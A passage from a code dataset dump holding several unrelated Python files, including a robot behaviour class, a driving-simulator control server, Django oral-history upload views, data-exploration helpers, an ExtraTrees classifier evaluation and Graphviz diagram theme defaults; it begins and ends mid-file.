hvor.append('M')\n elif x < mid - 15:\n hvor.append('L')\n elif x < mid + 15:\n hvor.append('R')\n return hvor\n\n @staticmethod\n def mostFrequent(liste):\n count = 0\n ch = None\n for i in liste:\n if i != ch:\n c = liste.count(i)\n if c > count:\n count = c\n ch = i\n return ch\n\n def get_motor_recommendations(self):\n hvor = self.where()\n if hvor: self.match_degree = 1\n char = self.mostFrequent(hvor)\n\n if hvor:\n if char == 'M':\n print(\"Goal detected: goal forward\")\n return (0.32, 0.32, 1)\n\n if char == 'L':\n print(\"Goal Detected: goal to the left\")\n return (-0.27, 0.27, 1)\n\n if char == 'R':\n print(\"Goal Detected: goal to the right\")\n return (0.27, -0.27, 1)\n\n else:\n print(\"No goal detected: No signal, not moving\")\n return (0,0,0)\n\n def unpack_sensor_variables(self):\n pass\n\n\n def consider_activation(self):\n if time.time() - self.init_time > 5:\n self.active_flag = True\n\n def consider_deactivation(self):\n if self.active_flag:\n self.active_flag = False\n self.match_degree = 0\n\n","sub_path":"Behaviours/red_ball_behavior.py","file_name":"red_ball_behavior.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"457428374","text":"#!/usr/bin/env python3\n\"\"\"\nplot individual neutral HDF5 files\n\"\"\"\n\nfrom pathlib import Path\nimport argparse\n\nimport h5py\nimport matplotlib.pyplot as plt\n\n\na = argparse.ArgumentParser()\na.add_argument(\"file\", help=\"neutral data file to plot\")\np = a.parse_args()\n\nfile = Path(p.file).expanduser().resolve(True)\n\nwith h5py.File(file, \"r\") as f:\n for k in {\"dn0all\", \"dnN2all\", \"dnO2all\", \"dvnrhoall\", \"dvnzall\", \"dTnall\"}:\n fg = plt.figure(constrained_layout=True)\n ax = fg.gca()\n\n ax.set_title(k)\n 
ax.pcolormesh(f[k][:].T)\n\nplt.show()\n","sub_path":"scripts/plot_neutral.py","file_name":"plot_neutral.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"165233009","text":"from flask import Flask\r\nimport eventlet\r\nimport socketio\r\nfrom keras.models import load_model\r\nimport base64\r\nfrom io import BytesIO\r\nfrom PIL import Image\r\nimport numpy as np\r\nfrom tensorflow import keras\r\nimport cv2\r\n\r\nsio = socketio.Server()\r\n\r\n\r\napp = Flask(__name__)\r\nspeed_limit = 10\r\n\r\ndef img_preprocess(img):\r\n img = img[60:135,:,:]\r\n img = cv2.cvtColor(img,cv2.COLOR_RGB2YUV)\r\n img = cv2.GaussianBlur(img, (3,3),0)\r\n img = cv2.resize(img,(200,66))\r\n img= img/255\r\n\r\n return img\r\n\r\n return img\r\n@sio.on('telemetry')\r\ndef telemetry(sid, data):\r\n if data:\r\n # The current steering angle of the car\r\n steering_angle = data[\"steering_angle\"]\r\n # The current throttle of the car\r\n throttle = data[\"throttle\"]\r\n # The current speed of the car\r\n speed = data[\"speed\"]\r\n # The current image from the center camera of the car\r\n imgString = data[\"image\"]\r\n image = Image.open(BytesIO(base64.b64decode(imgString)))\r\n image_array = np.asarray(image)\r\n image1 = cv2.resize(image_array, (66,200))\r\n steering_angle = float(model.predict(image1[None, :, :, :], batch_size=1))\r\n min_speed = 12\r\n max_speed = 24\r\n if float(speed) < min_speed:\r\n throttle = 1.0/10\r\n elif float(speed) > max_speed:\r\n throttle = -1.0\r\n else:\r\n throttle = 0.2\r\n\r\n print(steering_angle, throttle)\r\n send_control(steering_angle, throttle)\r\n\r\n # save frame\r\n #if args.image_folder != '':\r\n # timestamp = datetime.utcnow().strftime('%Y_%m_%d_%H_%M_%S_%f')[:-3]\r\n # image_filename = os.path.join(args.image_folder, timestamp)\r\n # image.save('{}.jpg'.format(image_filename))\r\n else:\r\n # NOTE: DON'T EDIT THIS.\r\n sio.emit('manual', data={}, skip_sid=True)\r\n\r\n@sio.on('connect')\r\ndef connect(sid,environ):\r\n print('connect')\r\n send_control(0,0)\r\n\r\ndef send_control(steering_angle,throttle):\r\n sio.emit('steer',data ={\r\n 'steering_angle':steering_angle.__str__(),\r\n 'throttle':throttle.__str__()\r\n })\r\n#send_control(0,1)\r\n\r\n\r\nif __name__=='__main__':\r\n model = load_model('model.h5')\r\n print(\"Original model:\", model)\r\n app = socketio.Middleware(sio,app)\r\n eventlet.wsgi.server(eventlet.listen(('',4567)),app)\r\n","sub_path":"drive.py","file_name":"drive.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"540905597","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api\n\nclass Model(models.Model):\n \"\"\"pbx provision\"\"\"\n \n _name = 'pbx.provision.device.model'\n _description = \"Device Model\"\n\n name = fields.Char(string='Name', size=64, required=True)\n manufacturer_id = fields.Many2one(comodel_name='pbx.provision.device.manufacturer', string='Manufacturer')\n lines = fields.Integer(string='Lines')\n template = fields.Text(string='Template')\n","sub_path":"pbx/models/provision/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"29613377","text":"from sklearn.feature_extraction.text import HashingVectorizer\nimport pymongo, numpy as np, sys, 
os\n\nsys.path.append(os.path.dirname(os.path.dirname(os.getcwd())))\nfrom pesquisas.search_engine.mongo_url import mongo_url\nfrom pesquisas.common.recursive_folders import recursive_folders\nfrom pesquisas.common_nlp.textNormalization import textNormalization\n\n\nclass main_class:\n def __init__(self):\n self.myclient = pymongo.MongoClient(mongo_url)\n self.DATABASE = \"jurisprudencia_se\"\n # self.DATABASE = 'banco_precos'\n self.COLLECTION = \"covid\"\n # self.COLLECTION = '2019'\n self.COLLECTION_CLUSTERS = self.COLLECTION + \"_cluster_\"\n self.COLLECTION_INDEX = self.DATABASE + \"_\" + self.COLLECTION + \"_index\"\n self.COLUMN_SOURCE = \"text\"\n # self.COLUMN_SOURCE = 'historico_despesa'\n self.ALTERNATE_COLUMN_SOURCE = \"\"\n self.VAR_NAME = \"vetor\"\n self.NUMBER_OF_CLUSTERS = 10\n # self.NUMBER_OF_CLUSTERS = 1000\n self.N_FEATURES = 25000\n self.mydb = self.myclient[self.DATABASE]\n self.myclient = pymongo.MongoClient(mongo_url)\n self.vectorizer = HashingVectorizer(\n n_features=self.N_FEATURES, dtype=np.float32\n )\n self.PATH = \"/mnt/Dados/Documents/covid19/covid_2020_new.csv\"\n # self.PATH = '/mnt/Dados/Documents/pesquisas_privado_dados/compras_publicas/Portais_transparência/2019'\n self.txtN = textNormalization()\n self.rec = recursive_folders()\n","sub_path":"search_engine/main_class.py","file_name":"main_class.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"134596772","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport datetime\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.mail import send_mail\nfrom django.http import HttpResponseRedirect, Http404, HttpResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic import TemplateView, ListView, FormView, UpdateView\nfrom django.views.generic.detail import DetailView\n\n\nfrom .models import Interview, OralHistory, Tag\nfrom .forms import InterviewForm, OHPForm, TagForm\nfrom project_share.models import Project, FileUpload, Application\n\nfrom django_teams.models import Team\n\n\nUser = get_user_model()\n\n# Create your views here.\n\n\nclass OralHistoryIndexView(ListView):\n template_name = 'oral_history/menu.html'\n model = OralHistory\n\n def get_queryset(self):\n queryset = OralHistory.objects.filter(is_official=True, approved=True)\n return queryset\n\n def get_classrooms(self):\n return OralHistory.objects.filter(is_official=False, approved=True)\n\n\nclass InterviewIndexView(ListView):\n template_name = 'oral_history/oral_history.html'\n model = Interview\n\n def slug_return(self):\n return self.kwargs['slug']\n\n def project(self):\n return OralHistory.objects.filter(slug=self.kwargs['slug'])\n\n def get_queryset(self):\n queryset = Interview.objects.filter(project__slug=self.kwargs['slug'], approved=True)\n return queryset\n\n\nclass InterviewView(TemplateView, FormView):\n template_name = 'oral_history/interview.html'\n form_class = TagForm\n\n def slug_return(self):\n return self.kwargs['slug']\n\n def slug_interview_return(self):\n return self.kwargs['slug_interview']\n\n def get_context_data(self, **kwargs):\n context = super(InterviewView, self).get_context_data(**kwargs)\n slug_interview = self.kwargs['slug_interview']\n context['interview_context'] = Interview.objects.filter(slug=slug_interview)\n pk = 
context['interview_context'][0].pk\n context['tags'] = Tag.objects.filter(interview__pk=pk, approved=True).order_by('timestamp')\n return context\n\n def get_initial(self):\n initial = super(InterviewView, self).get_initial()\n slug_interview = self.kwargs['slug_interview']\n initial['interview'] = Interview.objects.get(slug=slug_interview)\n return initial\n\n def form_valid(self, form):\n return HttpResponseRedirect(reverse('oral_history:thank_you_tag',\n kwargs={'slug': self.kwargs['slug'],\n 'slug_interview': self.kwargs['slug_interview']}))\n\n def form_invalid(self, form):\n return HttpResponseRedirect(reverse('oral_history:error'))\n\n def post(self, request, *args, **kwargs):\n form = TagForm(request.POST or None)\n if form.is_valid():\n new_tag = form.save(commit=False)\n new_tag.interview = Interview.objects.get(slug=self.kwargs['slug_interview'])\n new_tag.tag = form.cleaned_data['tag']\n hours = form.cleaned_data['hours']\n mins = form.cleaned_data['mins']\n secs = form.cleaned_data['secs']\n total_time = (hours * 3600) + (mins * 60) + secs\n new_tag.timestamp = datetime.timedelta(seconds=total_time)\n if not new_tag.interview.user == self.request.user:\n send_mail('CSDT: New Oral History Project Tag needs approval',\n 'There is a new oral history project tag that \\\n needs approval on the CSDT server admin. \\\n Please approve it.',\n 'csdtrpi@gmail.com',\n ['holmr@rpi.edu'],\n fail_silently=True)\n new_tag.approved = False\n else:\n new_tag.approved = True\n new_tag.save()\n form.save()\n\n return self.form_valid(form)\n else:\n return self.form_invalid(form)\n\n\nclass UploadInterview(LoginRequiredMixin, DetailView, FormView):\n template_name = 'oral_history/upload.html'\n form_class = InterviewForm\n success_url = reverse_lazy('oral_history:thank_you')\n\n def get_object(self, queryset=None):\n pass\n\n def form_valid(self, form):\n return HttpResponseRedirect(reverse('oral_history:thank_you'))\n\n def form_invalid(self, form):\n return HttpResponseRedirect(reverse('oral_history:error'))\n\n def get_initial(self):\n initial = super(UploadInterview, self).get_initial()\n try:\n original_project = OralHistory.objects.get(slug=self.kwargs['slug'])\n except:\n # exception can occur if the edited user has no groups\n # or has more than one group\n pass\n else:\n initial['project'] = original_project\n initial['user'] = self.request.user\n # classrooms = Team.objects.filter(users=self.request.user)\n # initial['classrooms'] = classrooms\n return initial\n\n def get_slug(self):\n return self.kwargs['slug']\n\n def get_form_kwargs(self):\n kwargs = super(UploadInterview, self).get_form_kwargs()\n kwargs.update({'user': self.request.user})\n return kwargs\n\n def post(self, request, *args, **kwargs):\n # self.object = self.get_object()\n form = InterviewForm(request.POST or None, request.FILES or None, user=request.user)\n if form.is_valid():\n new_interview = form.save(commit=False)\n if request.FILES:\n form.mp3_file = request.FILES['mp3_file']\n form.pic = request.FILES['pic']\n\n # text_dump = json.dumps([self.kwargs['slug'], slugify(form.cleaned_data['full_name'])])\n # project_blob = FileUpload(file_path=text_dump)\n # project_blob.save()\n image_blob = FileUpload(file_path=form.pic)\n image_blob.save()\n # find curr classroom\n # classroom =\n application = Application.objects.get(name=\"Oral Histories\")\n if form.cleaned_data['classroom']:\n classroom = Team.objects.get(pk=form.cleaned_data['classroom'])\n else:\n classroom = None\n new_proj = 
Project(name=form.cleaned_data['full_name'],\n description=form.cleaned_data['summary'],\n owner=request.user,\n application=application,\n classroom=classroom,\n screenshot=image_blob, )\n new_proj.save()\n new_interview.csdt_project = new_proj\n new_interview.save()\n form.save()\n send_mail('CSDT: New Oral History Project Interview needs approval',\n 'There is a new oral history project interview\\\n that needs approval on the CSDT server admin. \\\n Please approve it.', 'csdtrpi@gmail.com',\n ['holmr@rpi.edu'], fail_silently=True)\n return self.form_valid(form)\n # return HttpResponseRedirect(reverse('oral_history:upload'))\n return HttpResponse(render(request, 'oral_history/upload.html', {'form': form, }))\n\n\nclass UploadOHP(LoginRequiredMixin, DetailView, FormView):\n template_name = 'oral_history/upload_ohp.html'\n form_class = OHPForm\n success_url = reverse_lazy('oral_history:thank_you')\n\n def get_object(self, queryset=None):\n pass\n\n def form_valid(self, form):\n return HttpResponseRedirect(reverse('oral_history:thank_you_ohp'))\n\n def form_invalid(self, form):\n return HttpResponseRedirect(reverse('oral_history:error'))\n\n def get_initial(self):\n initial = super(UploadOHP, self).get_initial()\n initial['user'] = self.request.user\n return initial\n\n def get_form_kwargs(self):\n kwargs = super(UploadOHP, self).get_form_kwargs()\n kwargs.update({'user': self.request.user})\n return kwargs\n\n def post(self, request, *args, **kwargs):\n # self.object = self.get_object()\n form = OHPForm(request.POST or None, request.FILES or None, user=request.user)\n if form.is_valid():\n new_ohp = form.save(commit=False)\n if request.FILES:\n form.pic = request.FILES['pic']\n new_ohp.save()\n form.save()\n send_mail('CSDT: New Oral History Project needs approval',\n 'There is a new oral history project that needs approval \\\n on the CSDT server admin. 
Please approve it.',\n 'csdtrpi@gmail.com', ['holmr@rpi.edu'],\n fail_silently=True)\n return self.form_valid(form)\n else:\n return self.form_invalid(form)\n\n\nclass ThankYou(TemplateView):\n template_name = 'oral_history/thankyou.html'\n\n\nclass ThankYouOHP(TemplateView):\n template_name = 'oral_history/thankyou_ohp.html'\n\n\nclass ThankYouTag(TemplateView):\n template_name = 'oral_history/thankyou_tag.html'\n\n def get_slug(self):\n return self.kwargs['slug']\n\n def get_slug_interview(self):\n return self.kwargs['slug_interview']\n\n\nclass Error(TemplateView):\n template_name = 'oral_history/error.html'\n\n\nclass InterviewUpdate(LoginRequiredMixin, UpdateView):\n template_name = 'oral_history/upload_update.html'\n form_class = InterviewForm\n model = Interview\n\n def get_object(self, queryset=None):\n\n obj = Interview.objects.get(slug=self.kwargs['slug_interview'])\n if not obj.user == self.request.user:\n raise Http404\n return obj\n\n def get_slug(self):\n return self.kwargs['slug']\n\n def get_slug_interview(self):\n return self.kwargs['slug_interview']\n\n def form_valid(self, form):\n return HttpResponseRedirect(reverse('oral_history:thank_you'))\n\n def form_invalid(self, form):\n return HttpResponseRedirect(reverse('oral_history:error'))\n\n def get_initial(self):\n return {\n 'mp3_file': self.object.mp3_file,\n 'pic': self.object.pic,\n 'full_name': self.object.full_name,\n 'date': self.object.date,\n 'location': self.object.location,\n 'interview_by': self.object.interview_by,\n 'birthplace': self.object.birthplace,\n 'occupation': self.object.occupation,\n 'birth_year': self.object.birth_year,\n 'summary': self.object.summary,\n 'project': self.object.project,\n 'classroom': self.object.csdt_project.classroom,\n }\n\n success_url = reverse_lazy('home')\n\n def post(self, request, *args, **kwargs):\n self.object = self.get_object() # assign the object to the view\n form = InterviewForm(request.POST or None, request.FILES or None, instance=self.object)\n if form.is_valid():\n form.save()\n return self.form_valid(form)\n return render(\n request,\n 'oral_history/upload_update.html',\n {'form': form, })\n\n\nclass OHPUpdate(LoginRequiredMixin, UpdateView):\n template_name = 'oral_history/update_ohp.html'\n form_class = OHPForm\n model = OralHistory\n\n def get_object(self, queryset=None):\n\n obj = OralHistory.objects.get(slug=self.kwargs['slug'])\n if not obj.user == self.request.user:\n raise Http404\n return obj\n\n def form_valid(self, form):\n return HttpResponseRedirect(reverse('oral_history:thank_you'))\n\n def form_invalid(self, form):\n return HttpResponseRedirect(reverse('oral_history:error'))\n\n def get_initial(self):\n return {\n 'project_name': self.object.project_name,\n 'pic': self.object.pic,\n 'byline': self.object.byline,\n 'summary': self.object.summary,\n 'user': self.object.user,\n }\n\n success_url = reverse_lazy('home')\n\n def post(self, request, *args, **kwargs):\n self.object = self.get_object() # assign the object to the view\n form = OHPForm(request.POST or None, request.FILES or None, instance=self.object)\n if form.is_valid():\n form.save()\n return self.form_valid(form)\n return render(\n request,\n 'oral_history/update_ohp.html',\n {'form': form, })\n","sub_path":"oral_history/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"291117518","text":"\"\"\"\nThis module contains functions that explore distributions of 
values and\nrelationships between columns.\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef extrema(narray):\n \"\"\"\n Returns a (min, max) tuple for the narry.\n \"\"\"\n return (np.min(narray), np.max(narray))\n\n\ndef unique_columns(df):\n \"\"\"\n Returns a list of columns that have a unique value for every row.\n \"\"\"\n colnames = []\n for colname in df.columns:\n if df[colname].nunique() == len(df):\n colnames.append(colname)\n\n return colnames\n\n\ndef binary_columns(df):\n \"\"\"\n Returns a list of columns in the dataframe that only have two unique\n values.\n \"\"\"\n return [name for name in df.columns if len(pd.unique(df[name])) == 2]\n\n\ndef missing_columns(df):\n \"\"\"\n Returns a list of columns in the dataframe that include NaN or null values.\n \"\"\"\n total = len(df)\n counts = df.count()\n return [name for name in df.columns if counts[name] < total]\n\n\ndef plot_missing(df, *colnames):\n \"\"\"\n Plots a bar chart comparing the number of present and missing values for\n the given columns.\n \"\"\"\n fig = plt.figure(1, figsize=(9, 6))\n\n fig_columns = len(colnames) // 3 + 1;\n for i, colname in enumerate(colnames, start=1):\n plt.subplot(fig_columns, 3, i)\n missing = df[colname][df[colname].isnull()]\n present = df[colname][df[colname].notnull()]\n plt.title(colname)\n plt.bar(['present', 'missing'], [len(present), len(missing)])\n\n plt.tight_layout()\n plt.show()\n\n\ndef plot_label(df, colname):\n \"\"\"\n Plots a bar chart showing the distribution of values between true and\n false for a single column.\n \"\"\"\n plot_binary_predicate(df, colname, 'true', 'false', lambda col: col == True)\n\n\ndef plot_binary_predicate(df, col, true_name, false_name, predicate):\n \"\"\"\n Plots a bar chart showing the distribution of values between two classes,\n one where the predicate is true and one where the predicate is false.\n \"\"\"\n true_count = len(df[col][predicate(df[col])])\n false_count = len(df[col][~predicate(df[col])])\n plt.bar([true_name, false_name], [true_count, false_count])\n plt.show()\n","sub_path":"hw3/pipeline/explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"291629299","text":"# Loading Libraries\n\nimport pandas as pd\nfrom collections import Counter\nimport numpy as np\nfrom numpy import mean\nfrom numpy import std\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import RepeatedStratifiedKFold\nfrom matplotlib import pyplot as plt\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom imblearn.over_sampling import SMOTE\nfrom sklearn.model_selection import train_test_split\n\n\n# =============================================================================\n\n# load the csv file as a data frame\ndataframe = pd.read_csv('Pohang.csv')\nX = dataframe.iloc[:, :-1].values\ny = dataframe.iloc[:, 8].values\n\n#Rescale data (between 0 and 1)\nfrom sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler(feature_range=(0, 1))\nrescaledX = scaler.fit_transform(X)\n\n# Taking care of missing data\nfrom sklearn.impute import SimpleImputer\n# creating object for SimpleImputer class as \"imputer\"\nimputer = SimpleImputer(missing_values = np.nan, strategy = 'mean', verbose=0)\nimputer = imputer.fit(rescaledX[:, 1:8]) #upper bound is not included, but lower bound\nrescaledX[:, 1:8] = imputer.transform(rescaledX[:, 1:8])\n\n\n# 
=============================================================================\n\n# summarize the class distribution\ntarget = dataframe.values[:,-1]\ncounter = Counter(target)\nfor k,v in counter.items():\n\tper = v / len(target) * 100\n\tprint('Class=%s, Count=%s, Percentage=%.3f%%' % (k, v, per))\n \n# summarize class distribution\nprint(X.shape, y.shape,Counter(y))\n\n\n# Implementing SMOTE for the Imbalanced data in Multi-class classification\nsmote=SMOTE(\"minority\")\nX,y=smote.fit_sample(rescaledX,y)\n\n# Re-summarize class distribution\nprint(X.shape, y.shape,Counter(y))\n\n# To balance another minority class\nsmote=SMOTE(\"minority\")\nX,y=smote.fit_sample(X,y)\n\n# Re-summarize class distribution\nprint(X.shape, y.shape,Counter(y))\n\n# To balance another minority class\nsmote=SMOTE(\"minority\")\nX,y=smote.fit_sample(X,y)\n\n# Re-summarize class distribution\nprint(X.shape, y.shape,Counter(y))\n\n# =============================================================================\n\n# Separate data into test and training sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20)\n\n# =============================================================================\n\n# get a list of models to evaluate\ndef get_models():\n\tmodels = dict()\n\tfor i in range(1, 9):\n\t\tmodels[str(i)] = ExtraTreesClassifier(max_features=i)\n\treturn models\n\n# evaluate a given model using cross-validation\ndef evaluate_model(model):\n\tcv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1)\n\tscores = cross_val_score(model, X_train, y_train, scoring='accuracy', cv=cv, n_jobs=-1, error_score='raise')\n\treturn scores\n\n# get the models to evaluate\nmodels = get_models()\n\n# evaluate the models and store results\nresults, names = list(), list()\nfor name, model in models.items():\n\tscores = evaluate_model(model)\n\tresults.append(scores)\n\tnames.append(name)\n\tprint('>%s %.3f (%.3f)' % (name, mean(scores), std(scores)))\n \n# plot model performance for comparison\nimport matplotlib.pyplot as pyplot\npyplot.boxplot(results, labels=names, showmeans=True)\nplt.xlabel('Features of the input data')\nplt.ylabel('Accuracy score')\npyplot.show()\n\n\n\n\n\n","sub_path":"Machine Learning A-Z Template Folder/Part 3 - Classification/Section 19 - Decision Tree Classification/ExtraTreesEnsemble_Feature_Tunning.py","file_name":"ExtraTreesEnsemble_Feature_Tunning.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"427669602","text":"default_graph_attrs = {\n \"bgcolor\": \"white\",\n \"center\": \"false\",\n \"charset\": \"utf-8\",\n \"clusterrank\": \"local\",\n \"colorscheme\": \"\",\n \"comment\": \"\",\n \"compound\": \"true\",\n \"concentrate\": \"false\",\n \"fontcolor\": \"black\",\n \"fontname\": \"times-roman\",\n \"fontpath\": \"system-dependent\",\n \"fontsize\": \"14\",\n \"forcelabels\": \"true\",\n \"gradientangle\": \"\",\n \"imagepath\": \"\",\n \"label\": \"\",\n \"labeljust\": \"c\",\n \"labelloc\": \"b\",\n \"landscape\": \"false\",\n \"layout\": \"dot\",\n \"margin\": \"0\",\n \"mclimit\": \"1\",\n \"newrank\": \"false\",\n \"nodesep\": \"0.25\",\n \"nojustify\": \"false\",\n # \"nslimit\": \"\",\n # \"nslimit1\": \"\",\n \"ordering\": \"\",\n \"orientation\": \"0\",\n \"outputorder\": \"breadthfirst\",\n \"pack\": \"false\",\n # \"packmode\": \"node\",\n \"pad\": \"0.0555\",\n \"pagedir\": \"bl\",\n \"quantum\": \"0.0\",\n \"rankdir\": \"TB\",\n \"ranksep\": 
\"0.5\",\n \"ratio\": \"auto\",\n \"remincross\": \"true\",\n \"rotate\": \"0\",\n \"searchsize\": \"30\",\n \"showboxes\": \"0\",\n \"size\": \"\",\n \"sortv\": \"0\",\n \"splines\": \"line\",\n \"style\": \"\",\n \"viewport\": \"\",\n}\n\ndefault_cluster_attrs = {\n \"bgcolor\": \"transparent\",\n \"color\": \"black\",\n \"colorscheme\": \"\",\n \"fillcolor\": \"black\",\n \"fontcolor\": \"black\",\n \"fontname\": \"times-roman\",\n \"fontsize\": \"14\",\n \"gradientangle\": \"\",\n \"label\": \"\",\n \"labeljust\": \"c\",\n \"labelloc\": \"t\",\n \"layer\": \"\",\n \"margin\": \"8\",\n \"nojustify\": \"false\",\n \"pencolor\": \"black\",\n \"penwidth\": \"1\",\n \"peripheries\": \"1\",\n \"sortv\": \"0\",\n \"style\": \"\",\n}\n\ndefault_node_attrs = {\n \"color\": \"black\",\n \"colorscheme\": \"\",\n \"comment\": \"\",\n \"distortion\": \"0\",\n \"fillcolor\": \"lightgrey\",\n \"fixedsize\": \"false\",\n \"fontcolor\": \"black\",\n \"fontname\": \"times-roman\",\n \"fontsize\": \"14\",\n \"gradientangle\": \"\",\n \"group\": \"\",\n \"height\": \"0.5\",\n # \"image\": \"\",\n \"imagepos\": \"tc\",\n \"imagescale\": \"false\",\n # \"label\": \"\",\n \"labelloc\": \"c\",\n \"layer\": \"\",\n \"margin\": \"0.11,0.055\",\n \"nojustify\": \"false\",\n \"ordering\": \"\",\n \"orientation\": \"0\",\n \"penwidth\": \"1\",\n \"peripheries\": \"1\",\n \"pos\": \"\",\n \"regular\": \"false\",\n \"shape\": \"ellipse\",\n \"shapefile\": \"\",\n \"showboxes\": \"0\",\n \"sides\": \"4\",\n \"skew\": \"0\",\n \"sortv\": \"0\",\n \"style\": \"\",\n \"width\": \"0.75\",\n # \"xlabel\": \"\",\n}\n\ndefault_edge_attrs = {\n \"arrowhead\": \"normal\",\n \"arrowsize\": \"1\",\n \"arrowtail\": \"normal\",\n \"color\": \"black\",\n \"colorscheme\": \"\",\n \"comment\": \"\",\n \"constraint\": \"true\",\n \"decorate\": \"false\",\n \"dir\": \"forward\",\n \"fillcolor\": \"black\",\n \"fontcolor\": \"black\",\n \"fontname\": \"times-roman\",\n \"fontsize\": \"14\",\n \"headclip\": \"true\",\n \"headlabel\": \"\",\n \"headport\": \"center\",\n \"label\": \"\",\n \"labelangle\": \"-25\",\n \"labeldistance\": \"1\",\n \"labelfloat\": \"false\",\n \"labelfontcolor\": \"black\",\n \"labelfontname\": \"times-roman\",\n \"labelfontsize\": \"14\",\n \"layer\": \"\",\n \"lhead\": \"\",\n \"ltail\": \"\",\n \"minlen\": \"1\",\n \"nojustify\": \"false\",\n \"penwidth\": \"1\",\n \"pos\": \"\",\n \"samehead\": \"\",\n \"sametail\": \"\",\n \"showboxes\": \"0\",\n \"style\": \"\",\n \"tailclip\": \"true\",\n \"taillabel\": \"\",\n \"tailport\": \"center\",\n \"weight\": \"1\",\n \"xlabel\": \"\",\n}\n\nclass Default():\n\n def __init__(self, graph_attr_overrides={}, cluster_attr_overrides={}, node_attr_overrides={}, edge_attr_overrides={}, color_overrides=[]):\n \n self.graph_attrs = default_graph_attrs\n self.cluster_attrs = default_cluster_attrs\n self.edge_attrs = default_edge_attrs\n self.node_attrs = default_node_attrs\n self.colors = []\n\n if graph_attr_overrides is not None:\n self.graph_attrs.update(graph_attr_overrides)\n\n if cluster_attr_overrides is not None:\n self.cluster_attrs.update(cluster_attr_overrides)\n\n if node_attr_overrides is not None:\n self.node_attrs.update(node_attr_overrides)\n\n if edge_attr_overrides is not None:\n self.edge_attrs.update(edge_attr_overrides)\n\n if color_overrides:\n self.colors = color_overrides\n\n\nclass LightMode():\n\n def __init__(self, graph_attr_overrides={}, cluster_attr_overrides={}, node_attr_overrides={}, edge_attr_overrides={}, color_overrides=[]):\n\n 
self.graph_attrs = default_graph_attrs\n self.cluster_attrs = default_cluster_attrs\n self.edge_attrs = default_edge_attrs\n self.node_attrs = default_node_attrs\n self.colors = [\"#FBFBFB\", \"#EDEDED\", \"#E0E0E0\", \"#D3D3D3\"]\n\n theme_graph_attrs = {\n \"bgcolor\": \"white\",\n \"compound\": \"true\", \n \"pad\": \"1.0\",\n \"splines\": \"ortho\",\n \"nodesep\": \"1.0\",\n \"ranksep\": \"1.0\",\n \"fontname\": \"Calibri\",\n \"fontsize\": \"24\",\n \"fontcolor\": \"#2D3436\",\n \"style\": \"rounded\",\n \"rankdir\": \"LR\",\n \"labeljust\": \"l\",\n \"labelloc\": 't',\n }\n\n theme_cluster_attrs = {\n \"style\": \"rounded\",\n \"labeljust\": \"l\",\n \"pencolor\": \"#AEB6BE\",\n \"fontname\": \"Calibri\",\n \"fontsize\": \"12\",\n \"margin\": \"30\"\n }\n\n theme_node_attrs = {\n \"shape\": \"invis\",\n \"style\": \"rounded,filled\",\n \"fixedsize\": \"true\",\n \"width\": \"1.0\",\n \"height\": \"1.5\",\n \"labelloc\": \"b\",\n \"imagescale\": \"true\",\n \"fontname\": \"Calibri\",\n \"fontsize\": \"13\",\n \"fontcolor\": \"#2D3436\",\n \"color\": \"invis\",\n \"fillcolor\": \"invis\"\n }\n\n theme_edge_attrs = {\n \"penwidth\": \"2\",\n \"minlen\": \"2.0\",\n \"fontname\": \"Calibri\"\n }\n\n self.graph_attrs.update(theme_graph_attrs)\n self.cluster_attrs.update(theme_cluster_attrs)\n self.node_attrs.update(theme_node_attrs)\n self.edge_attrs.update(theme_edge_attrs)\n\n if graph_attr_overrides is not None:\n self.graph_attrs.update(graph_attr_overrides)\n\n if cluster_attr_overrides is not None:\n self.cluster_attrs.update(cluster_attr_overrides)\n\n if node_attr_overrides is not None:\n self.node_attrs.update(node_attr_overrides)\n\n if edge_attr_overrides is not None:\n self.edge_attrs.update(edge_attr_overrides)\n\n if color_overrides:\n self.colors = color_overrides\n\nclass DarkMode():\n\n def __init__(self, graph_attr_overrides={}, cluster_attr_overrides={}, node_attr_overrides={}, edge_attr_overrides={}, color_overrides=[]):\n\n self.graph_attrs = default_graph_attrs\n self.cluster_attrs = default_cluster_attrs\n self.edge_attrs = default_edge_attrs\n self.node_attrs = default_node_attrs\n \n theme_graph_attrs = {\n \"bgcolor\": \"#17202A\",\n \"compound\": \"true\", \n \"pad\": \"1.0\",\n \"splines\": \"ortho\",\n \"nodesep\": \"1.0\",\n \"ranksep\": \"1.0\",\n \"fontname\": \"Sans-Serif\",\n \"fontsize\": \"24\",\n \"fontcolor\": \"#EEEEEE\",\n \"style\": \"rounded\",\n \"rankdir\": \"LR\",\n \"labeljust\": \"l\",\n \"labelloc\": 't',\n }\n\n theme_cluster_attrs = {\n \"style\": \"rounded,dotted\",\n \"labeljust\": \"l\",\n \"pencolor\": \"#AEB6BE\",\n 